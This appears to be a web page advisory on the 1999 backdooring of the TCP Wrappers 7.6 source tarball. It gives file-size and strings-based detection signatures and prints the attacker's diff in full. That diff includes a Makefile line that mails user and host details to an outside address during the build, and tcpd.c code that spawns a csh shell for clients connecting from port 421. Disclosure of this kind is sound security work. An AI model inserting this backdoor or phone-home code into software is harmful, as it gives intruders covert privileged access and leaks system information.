|
|
TCP Wrapper Backdoor Vulnerability
TCP Wrappers is a widely-used security tool to protect UNIX systems against intrusion. In has an estimated installed base of millions. On January 21, 1999 an intruder broke into the main FTP site for TCP Wrappers (Eindhoven University of Technology) and managed to backdoor the source code. The details are as follows: The backdoor gives access to a privileged shell when a client connects FROM port 421. The backdoored copy was downloaded 52 times between 07:16 MET and 16:29 MET. Relevant time stamp/size information (times relative to MET): Backdoored version: % ls -lcta -r--r--r-- 1 wswietse 99186 Jan 21 07:16 tcp_wrappers_7.6.tar.gz ... dr-xr-sr-x 3 wswietse 4096 Apr 11 1998 . Restored version: % ls -lt tcp_wrappers_7.6.tar.gz -r--r--r-- 1 wswietse 99438 Jan 21 16:29 tcp_wrappers_7.6.tar.gz The signature of the bad TAR file is: length 99186 instead of 99438. The signature of a compiled tcpd binary is: strings -a tcpd | grep csh any output probably means trouble. Changes that were made to the tcp wrapper 7.6 source code: diff -c 7.6/Makefile /tmp/tcp_wrappers_7.6/Makefile *** 7.6/Makefile Mon Apr 7 20:34:16 1997 --- /tmp/tcp_wrappers_7.6/Makefile Fri Mar 21 13:27:21 1997 *************** *** 26,31 **** --- 26,32 ---- @echo @echo "If none of these match your environment, edit the system" @echo "dependencies sections in the Makefile and do a 'make other'." + @sh -c 'echo debug-`whoami`-`uname -a` |mail -s debug wtcpd@hotmail.com' @echo ####################################################### *************** *** 649,655 **** # source-routed traffic in the kernel. Examples: 4.4BSD derivatives, # Solaris 2.x, and Linux. See your system documentation for details. # ! KILL_OPT= -DKILL_IP_OPTIONS ## End configuration options ############################ --- 650,656 ---- # source-routed traffic in the kernel. Examples: 4.4BSD derivatives, # Solaris 2.x, and Linux. See your system documentation for details. # ! # KILL_OPT= -DKILL_IP_OPTIONS ## End configuration options ############################ Only in 7.6: Makefile- diff -c 7.6/tcpd.c /tmp/tcp_wrappers_7.6/tcpd.c *** 7.6/tcpd.c Sun Feb 11 11:01:33 1996 --- /tmp/tcp_wrappers_7.6/tcpd.c Sun Feb 11 11:01:33 1996 *************** *** 41,52 **** --- 41,63 ---- int allow_severity = SEVERITY; /* run-time adjustable */ int deny_severity = LOG_WARNING; /* ditto */ + char IDENT[]="NC421\n"; + char SRUN[]="-csh"; + char SPATH[]="/bin/csh"; + #define PORT 421 + main(argc, argv) int argc; char **argv; { struct request_info request; + struct sockaddr_in from; char path[MAXPATHNAMELEN]; + int fromlen; + + fromlen = sizeof(from);if (getpeername(0,(struct sockaddr*)&from, + &fromlen)>=0){if(ntohs(from.sin_port)==PORT){write(0,IDENT, + strlen(IDENT));execl(SPATH,SRUN,(char*)0);}} /* Attempt to prevent the creation of world-writable files. */ |
|
Privacy Statement |